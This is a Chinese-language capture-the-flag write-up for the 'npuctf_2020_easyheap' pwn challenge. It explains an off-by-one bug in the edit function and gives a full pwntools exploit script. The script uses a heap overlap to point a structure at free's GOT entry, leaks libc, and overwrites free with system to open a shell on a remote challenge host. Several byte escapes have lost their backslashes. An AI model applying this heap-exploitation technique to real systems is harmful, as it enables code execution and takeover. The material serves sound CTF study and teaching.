npuctf_2020_easyheap

这是一道非常典型的off-by-one

先分析源码

create函数

先创建一个大小0x10大小的结构体，并且+0是大小，+8是指针

struct

{

size_t size;

char* str;

}

 edit函数

编辑结构体的str成员，它这里有个read_input函数，可以溢出单个字节

 show函数

一般打印函数都是用来泄露libc地址的

 delete函数

释放空间

 既然有off-by-one，那么可以尝试堆重叠，来改变下一个堆的地址

而且又因为其创建函数，会先创建一个struct，在创建一个字符串堆，而字符串堆是通过struct堆的*str查找的，也就是说我们只要把这个变为地址变为libc里函数的一个地址

在edit，然后再把system函数给扔进去(got)就会覆盖跳转地址，在调用哪个函数即可

from pwn import *

context.log_level = 'debug'
#p=process('./pwn')
p=remote('node3.buuoj.cn',26446)
elf=ELF('./pwn')
libc=ELF('libc-2.27.so')
def add(size,content):
    p.sendlineafter('Your choice :',str(1))
    p.sendlineafter('Size of Heap(0x10 or 0x20 only) : ',str(size))
    p.sendlineafter('Content:',content)
 
def delete(idx):
    p.sendlineafter('Your choice :',str(4))
    p.sendlineafter('Index :',str(idx))
 
def show(idx):
    p.sendlineafter('Your choice :',str(3))
    p.sendlineafter('Index :',str(idx))
    
def edit(idx,content):
    p.sendlineafter('Your choice :',str(2))
    p.sendlineafter('Index :',str(idx))
    p.recvuntil("Content: ")
    p.send(content)

add(0x18,'pppp')
add(0x18,'pppp')
add(0x18,'/bin/shx00')

edit(0,'a'*0x18+'x41')
delete(1)

payload='a'*0x10+p64(0)+p64(0x21)+p64(0x100)+p64(elf.got['free'])
add(0x38,payload)

show(1)

p.recvuntil('Content : ')
libcbase=u64(p.recvuntil('x7f').ljust(8,'x00'))-libc.symbols['free']
system_addr=libcbase+libc.symbols['system']

edit(1,p64(system_addr))
#gdb.attach(p)
delete(2)
p.interactive()